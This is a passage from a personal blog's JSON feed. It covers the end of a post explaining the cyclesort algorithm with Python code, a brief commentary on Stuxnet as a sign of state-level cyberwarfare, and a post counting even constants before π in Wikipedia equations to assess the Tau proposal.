l[n]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span>                last_value<\/span><span style=\"color: #D73A49;\"> =<\/span><span> tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>                n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(last_value)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span><\/code><\/pre>\n<p>The <strong>cyclesort_simple<\/strong> algorithm only works on permutations of sets of\nnumbers ranging from <strong>0<\/strong> to <strong>n<\/strong>. There are other fast ways to sort data of\nthis restricted kind, but all the methods I know of require additional memory\nproportional to <strong>n<\/strong>. Cyclesort can do it without any extra storage at all,\nwhich is a neat trick.<\/p>\n<h2 id=\"visualising-cyclesort\">Visualising cyclesort<\/h2>\n<p>At this point, we have enough information to visualise the algorithm, so let's\ntake a look at the beastie we're working with. I've had to make some little\nadjustments to the usual sortvis.org visualisation process to cope with\ncyclesort. In the algorithm above, the first element is duplicated into the\nsecond position of each cycle, and that duplicate remains in play until it's\nover-written by the last element of the cycle. I changed the algorithm slightly\nto write a null placeholder at the start of the cycle to avoid duplicates, and\ntaught the sortvis.org visualiser to deal with \"empty\" slots.  The resulting\n<a rel=\"external\" href=\"http:\/\/sortvis.org\/visualisations.html\">weave<\/a> visualisation looks like this:<\/p>\n<div class=\"media\">\n    <a href=\"cyclesort.png\">\n        <img src=\"cyclesort.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This is quite satisfying - you can tell where each cycle begins and ends by the\ngaps, which span each cycle exactly. It's immediately clear that the\npermutation above, for instance, contained five cycles. Within each cycle, you\ncan follow along as each element replaces the next, until we finally close the\ngap by placing the last element in the first slot.<\/p>\n<p>The <a rel=\"external\" href=\"http:\/\/sortvis.org\/visualisations.html\">dense<\/a> visualisation is less\ninformative because the gaps are too small to see at a single-pixel width, and\nthe algorithm doesn't have much other large-scale structure. It still looks\nneat, though:<\/p>\n<div class=\"media\">\n    <a href=\"cyclesort-dense.png\">\n        <img src=\"cyclesort-dense.png\"  \/>\n    <\/a>\n\n    \n<\/div><h2 id=\"generalising-cyclesort\">Generalising cyclesort<\/h2>\n<p>Cyclesort works whenever we can write an implementation of the <strong>key<\/strong>\nfunction, so there's quite a bit of scope for clever exploitation of structured\ndata. The Haddon paper presents a solution for one common case: permutations\nwhose elements come from a relatively small set, where the number of occurances\nof each element is known. The insight is that the <strong>key<\/strong> function can have\npersistent state, letting us calculate the positions of elements incrementally\nas we work through the list.<\/p>\n<p>We begin by adding an extra argument to our sort function: a list <strong>(element,\ncount)<\/strong> tuples telling us a) the order of the keys, and b) the frequency with\nwhich each key occurs.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span>[(<\/span><span style=\"color: #032F62;\">&quot;a&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 10<\/span><span>), (<\/span><span style=\"color: #032F62;\">&quot;b&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 33<\/span><span>), (<\/span><span style=\"color: #032F62;\">&quot;c&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 18<\/span><span>), (<\/span><span style=\"color: #032F62;\">&quot;d&quot;<\/span><span>,<\/span><span style=\"color: #005CC5;\"> 41<\/span><span>)]<\/span><\/span><\/code><\/pre>\n<p>Now, in the sorted list, we know that there will be a contiguous blog of 10\n\"a\"s, followed by a contiguous block of 33 \"b\"s, and so forth. We can use this\ninformation to calculate the offset of each contiguous block up front:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> offsets<\/span><span>(keys):<\/span><\/span>\n<span class=\"giallo-l\"><span>    d<\/span><span style=\"color: #D73A49;\"> =<\/span><span> {}<\/span><\/span>\n<span class=\"giallo-l\"><span>    offset<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 0<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> key, occurences<\/span><span style=\"color: #D73A49;\"> in<\/span><span> keys:<\/span><\/span>\n<span class=\"giallo-l\"><span>        d[key]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> offset<\/span><\/span>\n<span class=\"giallo-l\"><span>        offset<\/span><span style=\"color: #D73A49;\"> +=<\/span><span> occurences<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> d<\/span><\/span><\/code><\/pre>\n<p>The <strong>key<\/strong> function uses this offset dictionary to look up the current index\nfor any element. Each time we insert an element into position, we increment the\nrelevant offset entry - next time we get to an element of the same type, we\nwill place it in the next position in the contiguous block. We also make a\nsmall modification to the algorithm to cater for the progressive position\nincrement process: we start a cycle only when the element is equal to or above\nthe position where it ought to be. Here's a Python implementation:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> offsets<\/span><span>(keys):<\/span><\/span>\n<span class=\"giallo-l\"><span>    d<\/span><span style=\"color: #D73A49;\"> =<\/span><span> {}<\/span><\/span>\n<span class=\"giallo-l\"><span>    offset<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #005CC5;\"> 0<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> key, occurences<\/span><span style=\"color: #D73A49;\"> in<\/span><span> keys:<\/span><\/span>\n<span class=\"giallo-l\"><span>        d[key]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> offset<\/span><\/span>\n<span class=\"giallo-l\"><span>        offset<\/span><span style=\"color: #D73A49;\"> +=<\/span><span> occurences<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> d<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> key<\/span><span>(o, element):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    return<\/span><span> o[element]<\/span><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">def<\/span><span style=\"color: #6F42C1;\"> cyclesort_general<\/span><span>(l, keys):<\/span><\/span>\n<span class=\"giallo-l\"><span>    o<\/span><span style=\"color: #D73A49;\"> =<\/span><span> offsets(keys)<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">    for<\/span><span> i<\/span><span style=\"color: #D73A49;\"> in<\/span><span style=\"color: #005CC5;\"> range<\/span><span>(<\/span><span style=\"color: #005CC5;\">len<\/span><span>(l)):<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">        if<\/span><span> i<\/span><span style=\"color: #D73A49;\"> &gt;=<\/span><span> key(o, l[i]):<\/span><\/span>\n<span class=\"giallo-l\"><span>            n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> i<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">            while<\/span><span style=\"color: #005CC5;\"> 1<\/span><span>:<\/span><\/span>\n<span class=\"giallo-l\"><span>                tmp<\/span><span style=\"color: #D73A49;\"> =<\/span><span> l[n]<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> !=<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span>                last_value<\/span><span style=\"color: #D73A49;\"> =<\/span><span> tmp<\/span><\/span>\n<span class=\"giallo-l\"><span>                n<\/span><span style=\"color: #D73A49;\"> =<\/span><span> key(o, last_value)<\/span><\/span>\n<span class=\"giallo-l\"><span>                o[last_value]<\/span><span style=\"color: #D73A49;\"> +=<\/span><span style=\"color: #005CC5;\"> 1<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                if<\/span><span> n<\/span><span style=\"color: #D73A49;\"> ==<\/span><span> i:<\/span><\/span>\n<span class=\"giallo-l\"><span>                    l[n]<\/span><span style=\"color: #D73A49;\"> =<\/span><span> last_value<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">                    break<\/span><\/span><\/code><\/pre>\n<p>This algorithm runs in <strong>O(n + m)<\/strong>, where <strong>n<\/strong> is the number of elements and\n<strong>m<\/strong> is the number of distinct element values. In practice <strong>m<\/strong> is usually\nsmall, so this is often tantamount to being <strong>O(n)<\/strong>.<\/p>\n<h2 id=\"the-code\">The code<\/h2>\n<p>As usual, the code for these visualisations have been incorporated into the\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/sortvis\">sortvis project<\/a>. I've also added the\nvisualisations above to the <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> website.<\/p>\n"},{"title":"What Stuxnet means","published":"2010-11-15T00:00:00+00:00","updated":"2010-11-15T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/stuxnet\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/stuxnet\/","content":"<p><a rel=\"external\" href=\"http:\/\/www.symantec.com\/connect\/blogs\/stuxnet-breakthrough\">The last bit of evidence is now\nin<\/a> - it appears\nthat the mysterious <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Stuxnet\">Stuxnet<\/a> worm was\nindeed aimed at Iran's nuclear capability. This means that we now know for sure\nthat Stuxnet was an event of great significance - the first example of a type of\nsophisticated interstate warfare that we can expect to see a lot more of in\nfuture. It neatly ties together a number of trends that we've been talking about\nto clients at <a rel=\"external\" href=\"http:\/\/www.nullcube.com\">Nullcube<\/a> for years:<\/p>\n<ul>\n<li><strong>The worm as a targeted delivery platform.<\/strong> Stuxnet spread indiscriminately,\nwaiting until it infected its intended target before springing into action.\nThis is a marvelous delivery platform with excellent deniability. When\nexecuted with flair - using multiple previously unknown vulnerabilities,\nspreading through both physical media and networks - it can be incredibly hard\nto defend against. Look for a Stuxnet-like worm that exfiltrates data from\ntargeted systems next.<\/li>\n<li><strong>Internet security is a national concern.<\/strong> There's a tendency to view the\nInternet as an internationally homogeneous network.  Stuxnet makes it (even\nmore) clear that the Internet is a domain for contest between nation states,\nand that national differences in security readiness and technology populations\nmatter. Look for more direct government involvement in tracking and improving\nthe security of local networks. I suspect we'll also see the rise of national\nperimeter defenses in some countries in the next few years.<\/li>\n<li><strong>Embedded systems are a target.<\/strong> Embedded systems are everywhere, are often\nignored when security is considered, and are opaque, difficult to inspect, and\ndifficult to monitor. This is a malware nirvana. Whether they are directly or\nindirectly connected to a network, embedded systems are a target. My\nprediction: soon, we'll see a Stuxnet-like worm that spreads directly from\nembedded system to embedded system, most likely affecting DSL modems. In fact,\nwe've already seen a clumsy precursor of this in <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Psyb0t\">Psyb0t<\/a>, discovered at the beginning of 2009.<\/li>\n<\/ul>\n<p>There's a lot about this incident that we will most likely never know. We're\nunlikely to find out who's behind Stuxnet (although Israel and the US seem to\nbe the only real possibilities). We're unlikely to find out if Stuxnet ever\nrepayed the immense technological capital its creators invested. But we do know\nthat it's a sign of things to come.<\/p>\n"},{"title":"Tau: is it worth switching?","published":"2010-10-04T00:00:00+00:00","updated":"2010-10-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/maths\/tau\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/maths\/tau\/","content":"<p>The mailing list for my <a rel=\"external\" href=\"http:\/\/dunedin.linux.net.nz\/Main\/HomePage\">local LUG<\/a>\nrecently had a small flurry of posts on <a rel=\"external\" href=\"http:\/\/www.tauday.com\/\">The Tau\nManifesto<\/a>, a proposal to replace of the constant \u03c0 with\n\u03c4, equal to 2\u03c0.  Pro- and anti- camps quickly emerged, and much beer will likely\nbe spilt over the issue at our next meeting.<\/p>\n<p>Disregarding for the moment any conceptual elegance or expanatory power that\nTau might have, I was interested to know if the move would really reduce\nredundancy in common mathematical expressions. Lets say (rather arbitrarily)\nthat Tau simplifies a mathematical expression whenever \u03c0 is preceded by an even\nconstant - that means that 2\u03c0 becomes \u03c4, and 4\u03c0 becomes 2\u03c4, and so forth. I had\na vague intuition that the majority of occurances of \u03c0 in the wild fell into\nthis category, which might indicate that \u03c4 is a more natural (or at least\nparsimonious) constant to use.  Was my hunch right? This, I felt, was something\nI could quantify.<\/p>\n<h2 id=\"methodology\">Methodology<\/h2>\n<p>I wrote a small script to crawl all the articles linked to from the Wikipedia\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/List_of_equations\">List of Equations<\/a> page. For\neach page, I extracted all mathematical expressions, and checked the LaTeX\nsource of each for occurances of the symbol \u03c0. A little bit of light parsing\nwas then done to check if the symbol was directly preceded by an integer\nconstant.  Finally, I rendered the LaTeX source back to images to produce the\nequation tables below.<\/p>\n<p>Of course, anyone of sound judgement will disregard what follows entirely, due\nto the many obvious shortcomings of this procedure and its underlying\nassumptions.  Readers of my blog, on the other hand, may find the results\ninteresting.<\/p>\n<h2 id=\"results\">Results<\/h2>\n<p>I found a total of 3173 equations, of which 133 contained the symbol \u03c0. Of these\n133 equations, the distribution of constant factors preceding \u03c0 looked like\nthis:<\/p>\n<div class=\"media\">\n    <a href=\"taugraph.png\">\n        <img src=\"taugraph.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I call this a straight win for Tau - the vast majority of expressions using \u03c0\n(119 of 133) are preceded by even integer constants.<\/p>\n<h2 id=\"equations\">Equations<\/h2>\n<p>Below are all the expressions that included \u03c0, plus the detected constant\nfactor. The headings point to the Wikipedia pages from which the equations were\ntaken.<\/p>\n<p>If nothing else, this list is a nice reminder of the mysterious ubiquity of a\nconstant involving the diameter and circumference of a circle in all aspects of\nphysics and higher math.<\/p>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Relativistic_wave_equations\">Relativistic wave equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"1.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Sine-Gordon_equation\">Sine-Gordon equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"2.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"3.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Fokker%E2%80%93Planck_equation\">Fokker\u2013Planck equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"4.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"5.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"6.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"7.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Euler%27s_equation\">Euler&#39;s equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"8.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Friedmann_equations\">Friedmann equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"9.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"10.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"11.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"12.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"13.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"14.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"15.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"16.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"17.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"18.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Vlasov_equation\">Vlasov equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"19.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"20.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"21.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Screened_Poisson_equation\">Screened Poisson equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"22.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"23.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"24.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"25.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"26.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Quadratic_equation\">Quadratic equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"27.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"28.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Stokes-Einstein_relation\">Stokes-Einstein relation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">6<\/td>\n        <td>\n            <img src=\"29.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">6<\/td>\n        <td>\n            <img src=\"30.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">6<\/td>\n        <td>\n            <img src=\"31.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Fisher_equation\">Fisher equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"32.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"33.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_odd\">None<\/td>\n        <td>\n            <img src=\"34.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"35.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Einstein%27s_field_equation\">Einstein&#39;s field equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"36.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"37.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"38.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"39.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"40.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"41.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"42.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"43.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"44.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"45.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"46.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"47.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"48.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"49.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"50.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"51.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">8<\/td>\n        <td>\n            <img src=\"52.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Sackur-Tetrode_equation\">Sackur-Tetrode equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"53.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Laplace%27s_equation\">Laplace&#39;s equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"54.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"55.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"56.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"57.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"58.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"59.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"60.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Cauchy-Riemann_equations\">Cauchy-Riemann equations<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"61.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Cubic_equation\">Cubic equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"62.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"63.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"64.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">4<\/td>\n        <td>\n            <img src=\"65.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"66.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Partial_differential_equation\">Partial differential equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> <th>expression<\/th>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"67.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"68.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"69.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"70.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"71.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_even\">2<\/td>\n        <td>\n            <img src=\"72.png\"\/>\n        <\/td>\n    <\/tr>\n    <tr>\n        <td style=\"text-align: center;\" class=\"factor_none\">None<\/td>\n        <td>\n            <img src=\"73.png\"\/>\n        <\/td>\n    <\/tr>\n<\/table>\n<h2><a href=\"http:\/\/en.wikipedia.org\/wiki\/Lane-Emden_equation\">Lane-Emden equation<\/a><\/h2>\n<table>\n    <th>constant<\/th> 